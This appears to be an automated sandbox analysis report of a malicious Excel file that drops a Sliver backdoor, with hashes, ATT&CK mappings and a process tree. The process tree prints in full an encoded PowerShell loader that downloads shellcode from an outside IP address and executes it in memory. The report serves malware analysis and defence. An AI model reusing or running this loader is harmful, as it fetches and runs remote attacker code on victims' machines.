sliver | bdaa3237dbb1a891bd347be0aabc60405ad3e15f0b2aad4a8be00e376cbf653e

General

Target

bdaa3237dbb1a891bd347be0aabc60405ad3e15f0b2aad4a8be00e376cbf653e.xls
Size

46KB
MD5

f0a405d9dfad843cd65fb032fcdc179f
SHA1

2ef5c97897837e42dded3e2770dee4f8545d613d
SHA256

bdaa3237dbb1a891bd347be0aabc60405ad3e15f0b2aad4a8be00e376cbf653e
SHA512

5a13aa94717114759d3a962c653b1a0edbc8db3c94fa937c470f761bb980f02da51d2995b18e31fe29b45e062ddc753b7a9a80e95a950e3326d543c716459d51
SSDEEP

768:C4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:xSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor discovery execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	524	2552	powershell.exe	29

Sliver RAT v2 1 IoCs

resource	yara_rule
behavioral1/memory/524-45-0x00000000063A0000-0x0000000006E1E000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	524	powershell.exe
6	524	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
524	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2552	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
524	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	524	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2552	EXCEL.EXE
2552	EXCEL.EXE
2552	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2552 wrote to memory of 524	2552	EXCEL.EXE	31
PID 2552 wrote to memory of 524	2552	EXCEL.EXE	31
PID 2552 wrote to memory of 524	2552	EXCEL.EXE	31
PID 2552 wrote to memory of 524	2552	EXCEL.EXE	31
PID 524 wrote to memory of 2228	524	powershell.exe	33
PID 524 wrote to memory of 2228	524	powershell.exe	33
PID 524 wrote to memory of 2228	524	powershell.exe	33
PID 524 wrote to memory of 2228	524	powershell.exe	33
PID 2228 wrote to memory of 2928	2228	csc.exe	34
PID 2228 wrote to memory of 2928	2228	csc.exe	34
PID 2228 wrote to memory of 2928	2228	csc.exe	34
PID 2228 wrote to memory of 2928	2228	csc.exe	34

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\bdaa3237dbb1a891bd347be0aabc60405ad3e15f0b2aad4a8be00e376cbf653e.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2552
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:524
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hupo8knb.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2228
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF5D5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF5C4.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab476.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF5D5.tmp

Filesize
1KB

MD5
4a24a2897bf9b69e7e63a9c20aafa626

SHA1
57da6c197ae690a41ea071a436fcc785555c5cc8

SHA256
19d6e123c61babf8d7a194370a42d9bc485f9169679d8d23aa67381aca8f7cf7

SHA512
409a6ae73a3f51dc6337d7994d531228739b27951c585bef02ad5966204247a8c4252f130901a66f943e4f01c68c4863756ae1a542a47461c09387f8b22f2c61

Download Submit
C:\Users\Admin\AppData\Local\Temp\hupo8knb.dll

Filesize
3KB

MD5
c0f0532f3abfe66992b5578a6b19d506

SHA1
b2d8c878440dc758f336fc4d89f1aaf2dfaf69cd

SHA256
4b8441ea9832e19be0e96e4993f169e36215c14b12525be08734a17aaa614ce7

SHA512
32c3638c7575baa18c2211670dd15e99df5e4054909c3822a0d24d2f1c205fd906ef43337a74b2571c22b5cce173749c22081daf7700ca570518a0ec9a4093c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\hupo8knb.pdb

Filesize
7KB

MD5
648cc324ec9242d89dc240cd2c1fbfa2

SHA1
78e8e2298bbac79936a97d23f9a22cb6667a1992

SHA256
d933c55f71332b43e7ca9de119fb627239dec2a49e77bda7abdb2493c34b15c1

SHA512
f71ef25961dceb4ad4f3fc41aabcb891adda50bcb79509ba2381bedfc4db6e3af4043b9711830da12c499749738065aec35f80110ecad8805062d35bd163386d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCF5C4.tmp

Filesize
652B

MD5
1c2e64280a82f8676c5532b2cb3e75f4

SHA1
9f50a46ef4fb4663b052dcccf94dd4fd6859987e

SHA256
dc146338549496ee5df91123d69d4beff64b1c65bd31f8e2e949b745a04c9e57

SHA512
5d3c63a20e800553d9a051ac5e6f3e89be0877eae15979d9aec974b94ce7f9962717294edecec6b6fd4ebf977552ba351e95a3941cc1b6103ecb5983d6d6763f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hupo8knb.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hupo8knb.cmdline

Filesize
309B

MD5
bb1188232fea737e882e5688887b3fa0

SHA1
ffa2bd6aa568f10aaa0bc3200dc0de70694ed943

SHA256
f20692b1b62dc626ad4a81fdc3d1cf424690947f6d5351773929dbb4a2935d20

SHA512
25e20db6b66f32611d414df9ca3e5c43183f32f4c62074e065cf32ac0c5c1a6f879485805c6f6c391c502cb65c44b565a1526ab4155ce3e664afac8bca99f785

Download Submit
memory/524-45-0x00000000063A0000-0x0000000006E1E000-memory.dmp

Filesize
10.5MB

Download
memory/2552-2-0x00000000006B0000-0x00000000007B0000-memory.dmp

Filesize
1024KB

Download
memory/2552-1-0x0000000072AED000-0x0000000072AF8000-memory.dmp

Filesize
44KB

Download
memory/2552-6-0x00000000006B0000-0x00000000007B0000-memory.dmp

Filesize
1024KB

Download
memory/2552-7-0x00000000006B0000-0x00000000007B0000-memory.dmp

Filesize
1024KB

Download
memory/2552-8-0x00000000006B0000-0x00000000007B0000-memory.dmp

Filesize
1024KB

Download
memory/2552-4-0x00000000006B0000-0x00000000007B0000-memory.dmp

Filesize
1024KB

Download
memory/2552-3-0x00000000006B0000-0x00000000007B0000-memory.dmp

Filesize
1024KB

Download
memory/2552-33-0x0000000072AED000-0x0000000072AF8000-memory.dmp

Filesize
44KB

Download
memory/2552-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2552-43-0x00000000006B0000-0x00000000007B0000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing